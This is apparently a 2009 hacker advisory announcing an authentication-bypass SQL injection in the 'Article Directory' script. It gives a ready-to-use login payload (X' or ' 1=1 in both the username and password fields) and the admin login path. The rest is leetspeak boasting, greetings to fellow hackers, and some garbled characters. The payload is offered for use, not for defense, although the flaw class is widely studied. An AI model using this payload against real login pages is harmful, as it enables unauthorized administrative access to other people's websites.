Article Directory SQL Injection Vulnerability :

Date : 2009-12-16 Author : R3d-D3v!L
[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[?]
[~] Vendor: www.yourarticlesdirectory.com
[?]
[?] Software: Article Directory 5cR!P7
[?]
[?] author: ((R3d D3v!L))
[?]
[?] Date: 15.12.2009
[?]
[?] Home: WwW.XP10.ME
[?]
[?] contact: [email protected]
[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????

[?] ERR0R CONSOLE

NOT FOUND CHAR_(N0T NULL)

[?]SECURE ALERT FR0M 7h3 R3d-D3V!L

[?] Exploit:

[?] User Name : X' or ' 1=1


[?] password : X' or ' 1=1

[?]demo:

[?]server/designs/demo/yad-admin/login.php

N073:
R34L R3d-D3V!L WAS h3R3 ((?0NE NAME 7h3Y ALL FA!R ?))

4R48!4N-HACK3R!!

[~]-----------------------------{str0ke}-----------------------------------------------------

[~] Greetz tO: dolly & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987

[~] 70 ِALL ARAB!AN HACKER 3X3PT : LAM3RZ

[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA

[?] spechial SupP0RT: MY M!ND ;) & ((OFFsec))

[?] 4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L))--M2Z--DEV!L_Ro07--JUPA

[~] spechial FR!ND: 74M3M

[~] !'M 4R48!4N 3XPL0!73R.

[~] {[(D!R 4ll 0R D!E)]};

[~]--------------------------------------------------------------------------------

C1

 

C2

 

C3